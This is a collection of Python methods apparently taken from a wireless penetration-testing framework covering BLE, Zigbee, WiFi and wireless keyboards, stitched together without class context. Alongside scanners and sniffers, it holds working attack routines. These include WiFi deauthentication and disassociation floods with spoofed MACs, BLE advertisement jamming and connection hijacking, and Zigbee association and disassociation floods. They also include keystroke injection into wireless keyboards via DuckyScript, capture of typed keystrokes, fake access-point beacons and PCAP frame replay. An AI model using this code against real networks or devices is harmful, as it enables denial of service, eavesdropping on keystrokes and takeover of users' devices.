def onStart(self): # Power Level between -100 and 20 dbm if "TXPOWER" in self.module.args and utils.integerArg( self.module.args['TXPOWER']) != None: self.txPwLvl = struct.pack( '<b', utils.integerArg(self.module.args['TXPOWER'])) else: self.txPwLvl = struct.pack('<b', MOCK_VALUES['gatt']['txPower']) # Local short name if 'NAME' in self.module.args and self.module.args['NAME'] != '': self.shortName = self.module.args['NAME'][0:10] else: self.shortName = MOCK_VALUES['gap']['localName'] if 'PAIRING' in self.module.args: self.pairing = utils.booleanArg(self.module.args['PAIRING']) else: self.pairing = MOCK_VALUES['control']['enable_pairing'] if self.pairing: self.module.pairing(active='passive') self.addPrimaryService() self.startAdv() return True
def run(self): interface = self.args["INTERFACE"] self.emitter = self.getEmitter(interface=interface) if self.checkCapabilities(): if self.emitter.isConnected(): self.emitter.sendp(ble.BLEDisconnect()) while self.emitter.isConnected(): utils.wait(seconds=0.01) address = (self.emitter.getAddress() if self.args["ADVERTISING_ADDRESS"] == "" else utils.addressArg(self.args["ADVERTISING_ADDRESS"])) if address != self.emitter.getAddress(): self.emitter.setAddress(address) if utils.isHexadecimal(self.args["SCANNING_DATA"]): scanningData = bytes.fromhex(self.args["SCANNING_DATA"]) else: scanningData = b"" if utils.isHexadecimal(self.args["ADVERTISING_DATA"]): advertisingData = bytes.fromhex(self.args["ADVERTISING_DATA"]) else: advertisingData = b"" destAddress = ("00:00:00:00:00:00" if self.args["DESTINATION_ADDRESS"] == "" else utils.addressArg(self.args["DESTINATION_ADDRESS"])) intervalMin = utils.integerArg(self.args["INTERVAL_MIN"]) intervalMax = utils.integerArg(self.args["INTERVAL_MAX"]) advertisingType = self.args["ADVERTISING_TYPE"].upper() advertisingAddressType = "public" if self.args[ "ADVERTISING_ADDRESS_TYPE"].lower() == "public" else "random" destinationAddressType = "public" if self.args[ "DESTINATION_ADDRESS_TYPE"].lower() == "public" else "random" self.emitter.setScanningParameters(data=scanningData) self.emitter.setAdvertisingParameters( type=advertisingType, destAddr=destAddress, data=advertisingData, intervalMin=intervalMin, intervalMax=intervalMax, daType=advertisingAddressType, oaType=destinationAddressType) self.emitter.setAdvertising( enable=utils.booleanArg(self.args["ENABLE"])) time = utils.integerArg( self.args['TIME']) if self.args["TIME"] != "" else -1 while time != 0: utils.wait(seconds=1) time -= 1 return self.ok({"INTERFACE": self.args["INTERFACE"]}) else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to send advertisements.") return self.nok()
def run(self): self.emitter = self.getEmitter(interface=self.args['INTERFACE']) self.receiver = self.getReceiver(interface=self.args['INTERFACE']) self.windowSize = utils.integerArg(self.args['WINDOW']) self.n = utils.integerArg(self.args['ENVIRONMENT_FACTOR']) self.devices = {} self.connections = {} # store rssi values over time self.values = {} self.deviceCallback = self.args['DEVICE_CALLBACK'] if callable( self.args['DEVICE_CALLBACK']) else self.display self.connectionCallback = self.args['CONNECTION_CALLBACK'] if callable( self.args['CONNECTION_CALLBACK']) else self.display self._dirty = False self.scanningTime = utils.integerArg( self.args['TIME']) if self.args["TIME"] != "" else -1 scanDev = self.args['SCAN_TYPE'] == 'all' or self.args[ 'SCAN_TYPE'] == 'devices' if scanDev: io.info('Scanning for existing devices') self.receiver.setSweepingMode(enable=True, sequence=[37, 38, 39]) self.receiver.sniffAdvertisements(address="FF:FF:FF:FF:FF:FF") self.receiver.onEvent("*", callback=self.onAdvertisement) remainingTime = self.scanningTime while remainingTime != 0: utils.wait(seconds=1) remainingTime -= 1 if (self._dirty): self.deviceCallback(self.devices) self._dirty = False # stop listening for advertisements self.receiver.setSweepingMode(enable=False) self.receiver.removeCallbacks() scanConn = self.args['SCAN_TYPE'] == 'all' or self.args[ 'SCAN_TYPE'] == 'connections' if scanConn: io.info('Scanning for existing connections') self.receiver.scanExistingConnections( onConnection=self.onConnectionFound, resetState=self.args['SCAN_TYPE'] == 'all') remainingTime = self.scanningTime while remainingTime != 0: utils.wait(seconds=1) remainingTime -= 1 if (self._dirty): self.connectionCallback(self.connections) self._dirty = False return self.ok({ 'devices': self.devices, 'connections': self.connections })
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) if self.checkCapabilities(): if utils.isNumber(self.args["CHANNEL"]): self.receiver.setChannel(utils.integerArg( self.args["CHANNEL"])) else: io.fail("You must provide a channel number !") return self.nok() if self.args["TARGET_PANID"] != "": self.targetPanID = utils.integerArg(self.args["TARGET_PANID"]) else: self.targetPanID = None if self.args["TARGET"] != "" and self.args["TARGET"][2:].upper( ) != "FFFF" and self.args["TARGET"].upper( ) != "FF:FF:FF:FF:FF:FF:FF:FF": if utils.isNumber(self.args["TARGET"]): self.target = utils.integerArg(self.args["TARGET"]) else: self.target = zigbee.convertAddress(self.args["TARGET"]) else: self.target = None if self.args["PCAP_FILE"] != "": self.pcap = self.getEmitter(interface=self.args["PCAP_FILE"]) else: self.pcap = None self.receiver.onEvent("*", callback=self.show) time = utils.integerArg( self.args['TIME']) if self.args["TIME"] != "" else None start = utils.now() while utils.now() - start <= time if time is not None else True: utils.wait(seconds=0.1) self.receiver.removeCallbacks() output = { "CHANNEL": self.args["CHANNEL"], "INTERFACE": self.args["INTERFACE"], "PCAP_FILE": self.args["PCAP_FILE"] } return self.ok(output) else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to sniff and inject frames.") return self.nok()
def jamAdvertisements(self): if self.checkAdvertisementsJammingCapabilities(): channel = utils.integerArg(self.args["CHANNEL"]) if self.args["TARGET"] != "": target = utils.addressArg(self.args["TARGET"]) pattern = bytes.fromhex(target.replace(":", ""))[::-1] offset = 2 elif (utils.isNumber(self.args["OFFSET"]) and utils.isHexadecimal(self.args["PATTERN"]) and self.args["OFFSET"] != "" and self.args["PATTERN"] != ""): pattern = bytes.fromhex(self.args["PATTERN"]) offset = utils.integerArg(self.args["OFFSET"]) else: io.fail( "You must provide a dewhitened pattern and an offset, or a target to jam." ) return self.nok() if len(self.emitters) == 1: self.emitters[0].jamAdvertisements(pattern=pattern, offset=offset, channel=channel) if len(self.emitters) == 2: self.emitters[0].jamAdvertisements(pattern=pattern, offset=offset, channel=channel) self.emitters[1].jamAdvertisements( pattern=pattern, offset=offset, channel=(channel + 1 if channel < 39 else 37)) if len(self.emitters) == 3: self.emitters[0].jamAdvertisements(pattern=pattern, offset=offset, channel=37) self.emitters[1].jamAdvertisements(pattern=pattern, offset=offset, channel=38) self.emitters[2].jamAdvertisements(pattern=pattern, offset=offset, channel=39) while True: utils.wait(seconds=0.01) else: io.fail("Interfaces provided are not able to jam advertisements.") return self.nok()
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) if self.checkSniffingCapabilities(): self.target = "FF:FF:FF:FF" if self.args[ "TARGET"] == "" else self.args["TARGET"].upper() if self.target == "FF:FF:FF:FF": self.receiver.enterPromiscuousMode() else: self.receiver.enterSnifferMode(self.target) if self.args["PCAP_FILE"] != "": self.pcap = self.getEmitter(interface=self.args["PCAP_FILE"]) if utils.booleanArg(self.args["DONGLE_PACKETS"]): self.receiver.enableDonglePackets() else: self.receiver.disableDonglePackets() if self.args["CHANNEL"] == "" or self.args["CHANNEL"].lower( ) == "auto": while not self.find(): io.info("Retrying ...") else: self.receiver.setChannel(utils.integerArg( self.args["CHANNEL"])) self.receiver.onEvent("*", callback=self.show) time = utils.integerArg( self.args['TIME']) if self.args["TIME"] != "" else None start = utils.now() while utils.now() - start <= time if time is not None else True: utils.wait(seconds=0.5) self.receiver.removeCallbacks() if self.pcap is not None: self.pcap.stop() output = {} output["MOUSE_FILE"] = self.args["MOUSE_FILE"] output["PCAP_FILE"] = self.args["PCAP_FILE"] output["TARGET"] = self.target output["CHANNEL"] = str(int(self.receiver.getChannel())) return self.ok(output) else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to run in sniffing mode.") return self.nok()
def keyDistribution(self, type="initiator"): if type == "initiator": keyDistribution = self.initiatorKeyDistribution else: keyDistribution = self.responderKeyDistribution if keyDistribution.encKey: io.info("Sending LTK...") self.emitter.sendp( ble.BLEEncryptionInformation( ltk=bytes.fromhex(self.args["LTK"])[::-1])) self.emitter.sendp( ble.BLEMasterIdentification( ediv=utils.integerArg(self.args["EDIV"]), rand=bytes.fromhex(self.args["RAND"]))) io.success("Sent !") if keyDistribution.idKey: io.info("Sending IRK...") self.emitter.sendp( ble.BLEIdentityInformation( irk=bytes.fromhex(self.args["IRK"])[::-1])) self.emitter.sendp( ble.BLEIdentityAddressInformation( address=utils.addressArg(self.args["ADDR"]), type=self.args["ADDR_TYPE"].lower())) io.success("Sent !") if keyDistribution.signKey: io.info("Sending CSRK...") self.emitter.sendp( ble.BLESigningInformation( csrk=bytes.fromhex(self.args["CSRK"])[::-1])) io.success("Sent !")
def run(self): self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): if utils.isNumber(self.args["CHANNEL"]): self.emitter.setChannel(utils.integerArg(self.args["CHANNEL"])) else: io.fail("You must provide a channel number !") return self.nok() self.pcapReceiver = self.getReceiver( interface=self.args["PCAP_FILE"]) io.info("Extracting packet stream from PCAP ...") stream = self.pcapReceiver.generateStream() io.success("Packet stream successfully extracted !") io.info("Injecting ...") self.emitter.sendp(*stream) for i in stream: i.show() while not self.emitter.isTransmitting(): utils.wait(seconds=0.1) while self.emitter.isTransmitting(): utils.wait(seconds=0.1) io.success("Injection done !") return self.ok() else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to inject frames.") return self.nok()
def run(self): interface = self.args["INTERFACE"] timeout = utils.integerArg(self.args["TIMEOUT"]) self.emitter = self.getEmitter(interface=interface) self.receiver = self.getReceiver(interface=interface) if self.checkCapabilities(): io.info("Trying to connect to : " + self.args["TARGET"] + " (type : " + self.args["CONNECTION_TYPE"] + ")") self.emitter.sendp( ble.BLEConnect(self.args["TARGET"], type=self.args["CONNECTION_TYPE"])) while not self.receiver.isConnected() and timeout > 0: timeout -= 1 utils.wait(seconds=1) if self.receiver.isConnected(): io.success("Connected on device : " + self.args["TARGET"]) return self.ok({"INTERFACE": self.args["INTERFACE"]}) else: io.fail("Error during connection establishment !") self.emitter.sendp(ble.BLEConnectionCancel()) return self.nok() else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to initiate connection.") return self.nok()
def send_deauth(self): packet_count = utils.integerArg(self.args["COUNT"]) if packet_count == 0: count = 0 while True: if self.args["MODE"].lower( ) == "both" or self.args["MODE"].lower() == "deauthentication": self.emitter.sendp(self.deauth_packet) if self.args["MODE"].lower( ) == "both" or self.args["MODE"].lower() == "disassociation": self.emitter.sendp(self.disas_packet) utils.wait(seconds=0.05) count += 1 if count % 100 == 0 and utils.booleanArg(self.args['VERBOSE']): io.info("Sent {} deauthentication packets via {}".format( count, self.args["INTERFACE"])) else: for count in range(packet_count): if self.args["MODE"].lower( ) == "both" or self.args["MODE"].lower() == "deauthentication": self.emitter.sendp(self.deauth_packet) if self.args["MODE"].lower( ) == "both" or self.args["MODE"].lower() == "disassociation": self.emitter.sendp(self.disas_packet) utils.wait(seconds=0.05) if count % 100 == 0 and utils.booleanArg(self.args['VERBOSE']): io.info("Sent {} deauthentication packets via {}".format( count, self.args["INTERFACE"]))
def run(self): self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): if not utils.isNumber(self.args["CHANNEL"]): io.fail("You must provide a channel number.") return self.nok() if self.args["TARGET"] == "": io.warning( "No target provided, the attack is performed in broadcast." ) self.target = "FF:FF:FF:FF:FF:FF" else: io.info("Target provided: " + str(self.args["TARGET"])) self.target = self.args["TARGET"].upper() if self.args["SOURCE"] == "": io.fail("You must provide a source address.") return self.nok() else: self.source = self.args["SOURCE"].upper() if utils.isNumber(self.args["REASON"]): self.reason = utils.integerArg(self.args["REASON"]) else: io.fail("You must provide a reason number.") return self.nok() self.emitter.setChannel(utils.integerArg(self.args["CHANNEL"])) # We forge the deauthentication and disassociation packet, while spoofing the client's MAC self.deauth_packet = wifi.WifiDeauth(destMac=self.target, srcMac=self.source, reason=self.reason) self.disas_packet = wifi.WifiDisas(destMac=self.target, srcMac=self.source, reason=self.reason) self.send_deauth() return self.ok() else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to run in monitor mode.") return self.nok()
def displayDevices(self): if utils.integerArg(self.args["START_CHANNEL"]) != utils.integerArg( self.args["END_CHANNEL"]): sys.stdout.write(" " * 100 + "\r") columnsNames = ["Pan ID", "Channel", "Association permitted", "Nodes"] networks = [] nodes = "" for panID, network in self.devices.items(): for node, role in network["nodes"].items(): nodes += zigbee.addressToString(node) + "(" + role + ")" + "\n" networks.append([ hex(panID), str(network["channel"]), "yes" if network["associationPermitted"] else ("unknown" if network["associationPermitted"] is None else "no"), nodes[:-1] ]) io.chart(columnsNames, networks)
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) if self.checkCapabilities(): frequency = self.receiver.getFrequency() if frequency != utils.integerArg(self.args["FREQUENCY"]): self.receiver.setFrequency(utils.integerArg(self.args["FREQUENCY"])) self.count = utils.integerArg(self.args["NUMBER"]) if utils.isNumber(self.args["NUMBER"]) else 1 self.receiver.onEvent("*",callback=self.show) self.receiver.waitData() while self.count > 0: utils.wait(seconds=0.5) output = self.generateOutput() return self.ok(output) else: io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to sniff IR signals.") return self.nok()
def run(self): if self.args["PCAP_FILE"] != "": self.pcap = self.getEmitter(self.args["PCAP_FILE"]) else: self.pcap = None self.initEmittersAndReceivers() if self.args["LTK"] != "": ble.BLELinkLayerCrypto.provideLTK(bytes.fromhex(self.args["LTK"])) if utils.booleanArg(self.args["HIJACKING"]) and not self.checkHijackingCapabilities(): io.fail("Interfaces provided are not able to hijack a connection.") return self.nok() if utils.booleanArg(self.args["JAMMING"]) and not self.checkJammingCapabilities(): io.fail("Interfaces provided are not able to jam a connection.") return self.nok() if self.args["SNIFFING_MODE"].upper() == "newConnections".upper(): if self.checkNewConnectionCapabilities(): target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"]) return self.sniffNewConnections(target, utils.integerArg(self.args["CHANNEL"])) else: io.fail("Interfaces provided are not able to sniff new connections.") return self.nok() elif self.args["SNIFFING_MODE"].upper() == "existingConnections".upper(): if self.checkExistingConnectionCapabilities(): accessAddress = utils.integerArg(self.args["ACCESS_ADDRESS"]) if self.args["ACCESS_ADDRESS"]!="" else None crcInit = utils.integerArg(self.args["CRC_INIT"]) if self.args["CRC_INIT"]!="" else None channelMap = utils.integerArg(self.args["CHANNEL_MAP"]) if self.args["CHANNEL_MAP"]!="" else None return self.sniffExistingConnections(self.receivers[0], accessAddress, crcInit, channelMap) else: io.fail("Interfaces provided are not able to sniff existing connections.") return self.nok() elif self.args["SNIFFING_MODE"].upper() == "advertisements".upper(): if self.checkAdvertisementsCapabilities(): target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"]) return self.sniffAdvertisements(target, utils.integerArg(self.args["CHANNEL"])) else: io.fail("Interfaces provided are not able to sniff advertisements.") return self.nok() return self.ok()
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): self.receiver.onEvent("*", callback=self.updateDevices) start = utils.now() startChannel = utils.integerArg(self.args["START_CHANNEL"]) endChannel = utils.integerArg(self.args["END_CHANNEL"]) numberOfChannels = endChannel + 1 - startChannel channels = list(range(startChannel, endChannel + 1)) i = 0 while self.args["TIME"] == "" or utils.now( ) - start < utils.integerArg(self.args["TIME"]): if startChannel != endChannel: io.progress(i, total=numberOfChannels, suffix="Channel: " + (" " if len(str(channels[i])) == 1 else "") + str(channels[i])) self.receiver.setChannel(channels[i]) if utils.booleanArg(self.args["ACTIVE"]): self.emitter.sendp( zigbee.ZigbeeBeaconRequest(sequenceNumber=1, destPanID=0xFFFF, destAddr=0xFFFF)) utils.wait(seconds=0.1) i = (i + 1) % len(channels) if startChannel != endChannel: sys.stdout.write(" " * 100 + "\r") if len(self.devices) == 0: return self.nok() else: return self.generateOutput() else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to sniff and inject frames.") return self.nok()
def run(self): self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) if self.checkInjectingCapabilities(): self.pcapReceiver = self.getReceiver(interface=self.args["PCAP_FILE"]) self.target = "FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"]) if self.target == "FF:FF:FF:FF:FF" and not self.checkPassiveScanningCapabilities(): io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to scan in promiscuous mode, you have to provide a specific target.") return self.nok() if self.target != "FF:FF:FF:FF:FF" and self.args["CHANNEL"].lower() == "auto" and not self.checkActiveScanningCapabilities(): io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to perform an active scan.") return self.nok() if self.target == "FF:FF:FF:FF:FF": io.info("Promiscuous mode enabled ! Every frame contained in the file indicated in PCAP_FILE will be transmitted.") self.emitter.enterPromiscuousMode() else: io.info("Sniffing mode enabled !") self.emitter.enterSnifferMode(address=self.target) if utils.isNumber(self.args["CHANNEL"]): self.emitter.setChannel(utils.integerArg(self.args["CHANNEL"])) elif self.args["CHANNEL"].lower() == "auto": self.searchChannel() else: io.fail("A channel must be provided in order to perform an injection.") return self.nok() io.info("Extracting packet stream from PCAP ...") stream = self.pcapReceiver.generateStream() io.success("Packet stream successfully extracted !") io.info("Injecting ...") self.emitter.sendp(*stream) while not self.emitter.isTransmitting(): utils.wait(seconds=0.1) while self.emitter.isTransmitting(): utils.wait(seconds=0.1) io.success("Injection done !") return self.ok() else: io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to inject.") return self.nok()
def generateChannels(self): if self.args["CHANNELS"] == "all" or self.args["CHANNELS"] == "": self.channels = range(100) io.info("Channels: 0-99") else: for i in utils.listArg(self.args["CHANNELS"]): if utils.isNumber(i): self.channels.append(utils.integerArg(i)) elif "-" in i and len(i.split("-")) == 2 and all( [utils.isNumber(j) for j in i.split("-")]): upChannel, downChannel = [int(j) for j in i.split("-")] self.channels += range(upChannel, downChannel) io.info("Channels: " + ','.join([str(j) for j in self.channels]))
def run(self): self.receiver = self.getReceiver(self.args["INTERFACE"]) self.receiver.enterPromiscuousMode() if self.checkPromiscuousSniffingCapabilities(): self.receiver.onEvent("*", callback=self.add) if utils.booleanArg(self.args["DONGLE_PACKETS"]): self.receiver.enableDonglePackets() else: self.receiver.disableDonglePackets() start = utils.now() startChannel = utils.integerArg(self.args["START_CHANNEL"]) endChannel = utils.integerArg(self.args["END_CHANNEL"]) numberOfChannels = endChannel + 1 - startChannel channels = list(range(startChannel, endChannel + 1)) i = 0 while self.args["TIME"] == "" or utils.now( ) - start < utils.integerArg(self.args["TIME"]): io.progress(i, total=numberOfChannels, suffix="Channel: " + (" " if len(str(channels[i])) == 1 else "") + str(channels[i])) self.receiver.setChannel(channels[i]) utils.wait(seconds=0.1) self.displayDevices() i = (i + 1) % len(channels) sys.stdout.write(" " * 100 + "\r") if len(self.devices) >= 1: return self.ok(self.generateOutput()) else: return self.nok() else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to run in promiscuous mode.") return self.nok()
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): self.receiver.enterSnifferMode( utils.addressArg(self.args["TARGET"])) if self.checkInjectionSyncCapabilities(): if utils.booleanArg(self.args["SYNC"]): self.receiver.enableSync() else: self.receiver.disableSync() else: io.warning( "Synchronized injection is not supported by this interface, the SYNC parameter will be ignored ..." ) self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"])) if self.args["TEXT"] != "": keystrokes = self.addMosartText(self.args["TEXT"]) self.emitter.sendp(*keystrokes) while not self.emitter.isTransmitting(): utils.wait(seconds=0.1) while self.emitter.isTransmitting(): utils.wait(seconds=0.1) elif self.args["DUCKYSCRIPT"] != "": parser = DuckyScriptParser(filename=self.args["DUCKYSCRIPT"]) keystrokes = parser.generatePackets( textFunction=self.addMosartText, initFunction=self.startMosartInjection, keyFunction=self.addMosartKeystroke, sleepFunction=self.addMosartDelay) self.emitter.sendp(*keystrokes) while not self.emitter.isTransmitting(): utils.wait(seconds=0.1) while self.emitter.isTransmitting(): utils.wait(seconds=0.1) elif utils.booleanArg(self.args["INTERACTIVE"]): self.stop = False self.watchKeyboard() while not self.stop: utils.wait(seconds=0.5) return self.ok() else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to inject frames and run in sniffing mode.") return self.nok()
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"])) if self.args["TARGET_PANID"] == "": io.fail("You must specify a target Pan ID.") return self.nok() self.panid = utils.integerArg(self.args["TARGET_PANID"]) io.info("PanID selected: 0x"+"{:04x}".format(self.panid).upper()) if self.args["TARGET"] != "": self.target = utils.integerArg(self.args["TARGET"]) else: io.warning("No target specified, Beacon Requests will be transmitted in order to discover the coordinator...") self.target = None while self.target is None: self.emitter.sendp(zigbee.ZigbeeBeaconRequest(sequenceNumber=1,destPanID=self.panid,destAddr=0xFFFF)) pkt = self.receiver.next(timeout=1) if isinstance(pkt,zigbee.ZigbeeBeacon) and pkt.coordinator and pkt.srcPanID == self.panid: self.target = pkt.srcAddr io.info("Coordinator selected: "+zigbee.addressToString(self.target)) while True: address = random.randint(0,0xFFFF) io.info("New address: "+zigbee.addressToString(address)) self.emitter.sendp(zigbee.ZigbeeAssociationRequest(destPanID=self.panid, destAddr=self.target,srcAddr=address,sequenceNumber=1,deviceType=True,srcPanID=0xFFFF)) self.emitter.sendp(zigbee.ZigbeeDataRequest(destPanID=self.panid, destAddr=self.target,srcAddr=address,sequenceNumber=2)) utils.wait(seconds=2) return self.ok() else: io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to communicate as a Zigbee device.") return self.nok()
def onStart(self): if 'REQUESTS' in self.module.args and utils.integerArg( self.module.args['REQUESTS'], 0) > 0: self.requests = utils.integerArg(self.module.args['REQUESTS']) else: self.requests = MOCK_VALUES['control']['number_requests'] if 'INTERVAL' in self.module.args and utils.integerArg( self.module.args['INTERVAL'], 0) > 0: self.interval = utils.integerArg(self.module.args['INTERVAL']) else: self.interval = MOCK_VALUES['control']['request_time_interval'] if 'PAIRING' in self.module.args: self.pairing = utils.booleanArg(self.module.args['PAIRING']) else: self.pairing = MOCK_VALUES['control']['enable_pairing'] if 'TARGET' in self.module.args and self.module.args['TARGET'] != '': self.target = self.module.args['TARGET'] io.info('Provided target at ' + self.target) self.customConnect() else: self.target = "" if 'NAME' in self.module.args and self.module.args['NAME'] != '': self.searchFor = self.module.args['NAME'] else: self.searchFor = MOCK_VALUES['gap']['localName'] self.module.receiver.onEvent("BLEAdvertisement", callback=self.onAdvertisement) self.module.receiver.setScan(enable=True) io.info('Scanning for slave named "' + self.searchFor + '"') return True
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) self.receiver.enterSnifferMode(utils.addressArg(self.args["TARGET"])) if self.checkSniffingCapabilities(): self.receiver.onEvent("MosartKeyboardKeystrokePacket",callback=self.show) self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"])) try: time = utils.integerArg(self.args['TIME']) if self.args["TIME"] != "" else None start = utils.now() while utils.now() - start <= time if time is not None else True: utils.wait(seconds=0.5) except KeyboardInterrupt: self.exportTextFile() self.receiver.removeCallbacks() return self.ok({"TEXT":self.text}) self.exportTextFile() self.receiver.removeCallbacks() return self.ok({"TEXT":self.text}) else: io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to run in sniffing mode.") return self.nok()
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"])) if self.args["TARGET_PANID"] == "": io.fail("You must specify a target Pan ID.") return self.nok() self.panid = utils.integerArg(self.args["TARGET_PANID"]) io.info("PanID selected: 0x"+"{:04x}".format(self.panid).upper()) if self.args["TARGET"] != "": self.target = utils.integerArg(self.args["TARGET"]) else: io.fail("You must specify a target.") return self.nok() io.info("Target selected: "+zigbee.addressToString(self.target)) if self.args["SOURCE"] != "": self.source = utils.integerArg(self.args["SOURCE"]) else: io.fail("You must specify a source address.") return self.nok() io.info("Source selected: "+zigbee.addressToString(self.source)) self.reason = utils.integerArg(self.args["REASON"]) while True: self.emitter.sendp(zigbee.ZigbeeDisassociationNotification(destPanID=self.panid, srcAddr=self.source,destAddr=self.target,sequenceNumber=1,reason=self.reason)) return self.ok() else: io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to communicate as a Zigbee device.") return self.nok()
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) if self.checkCapabilities(): self.receiver.onEvent("BLEAdvertisement",callback=self.scan) time = utils.integerArg(self.args['TIME']) if self.args["TIME"] != "" else -1 self.receiver.setScan(enable=True) while time != 0: utils.wait(seconds=1) time -= 1 self.updateDevices() self.receiver.setScan(enable=False) return self.generateOutput() else: io.fail("Interface provided ("+self.args["INTERFACE"]+") is not able to scan.") return self.nok()
def run(self): self.emitter = bt.BluetoothEmitter(interface=self.args['INTERFACE']) self.receiver = bt.BluetoothReceiver(interface=self.args['INTERFACE']) time = utils.integerArg(self.args['TIME']) self.emitter.sendp(bt.BluetoothInquiry(inquiryLength=time)) scanning = True while scanning: packet = self.receiver.next() if isinstance(packet, bt.BluetoothInquiryComplete): scanning = False elif isinstance(packet, bt.BluetoothInquiryScanResult): self.updateDevices(packet) return self.ok()
def masterLongTermKeyRequest(self, pkt): pkt.show() if pkt.ediv == 0 and pkt.rand == b"\x00" * 8 and self.stk != b"\x00" * 8: self.emitter.sendp( ble.BLELongTermKeyRequestReply(positive=True, ltk=self.stk[::-1])) self.keyDistribution(type="responder") elif pkt.ediv == utils.integerArg( self.args["EDIV"]) and pkt.rand == bytes.fromhex( self.args["RAND"]): self.emitter.sendp( ble.BLELongTermKeyRequestReply(positive=True, ltk=bytes.fromhex( self.args["LTK"])[::-1])) else: self.emitter.sendp(ble.BLELongTermKeyRequestReply(positive=False))
def monitoring(self): self.receiver.onEvent("*", callback=self.onPacket) try: if self.args["TIME"] == "": while True: utils.wait(seconds=0.00001) elif utils.isNumber(self.args["TIME"]): time = utils.integerArg(self.args["TIME"]) start = utils.now() while utils.now() - start < time: utils.wait(seconds=0.0000001) else: io.fail("You have provided a wrong TIME value.") return self.nok() except KeyboardInterrupt: pass
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): self.receiver.onEvent("WifiProbeRequest", callback=self.probeResponse) self.emitter.setChannel(utils.integerArg(self.args["CHANNEL"])) while True: self.emitter.sendp( wifi.WifiBeacon(SSID=self.args["SSID"], cypher=self.args["CYPHER"])) utils.wait(seconds=0.1) return self.ok() else: io.fail( "Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to communicate as an access point and run in monitor mode." ) return self.nok()
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): self.receiver.enterSnifferMode( utils.addressArg(self.args["TARGET"])) if self.checkInjectionSyncCapabilities(): if utils.booleanArg(self.args["SYNC"]): self.receiver.enableSync() else: self.receiver.disableSync() else: io.warning( "Synchronized injection is not supported by this interface, the SYNC parameter will be ignored ..." ) self.pcapReceiver = self.getReceiver( interface=self.args["PCAP_FILE"]) self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"])) io.info("Extracting packet stream from PCAP ...") stream = self.pcapReceiver.generateStream() io.success("Packet stream successfully extracted !") io.info("Injecting ...") self.emitter.sendp(*stream) while not self.emitter.isTransmitting(): utils.wait(seconds=0.1) while self.emitter.isTransmitting(): utils.wait(seconds=0.1) io.success("Injection done !") return self.ok() else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to inject frames and run in sniffing mode.") return self.nok()
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): self.receiver.onEvent("*",callback=self.scan) accessPoints = {} channel = 0 for i in range(utils.integerArg(self.args['TIME'])): self.receiver.setChannel(channel+1) self.emitter.sendp(wifi.WifiProbeRequest(srcMac = 'FF:FF:FF:FF:FF:FF', destMac= 'FF:FF:FF:FF:FF:FF', emitMac = "FF:FF:FF:FF:FF:FF")) channel = (channel+1) % 14 utils.wait(seconds=1) if utils.booleanArg(self.args["ACCESS_POINTS"]): self.updateAccessPoints() if utils.booleanArg(self.args["STATIONS"]): self.updateStations() output = self.generateOutput() return self.ok(output) else: io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to scan and run in monitor mode.") return self.nok()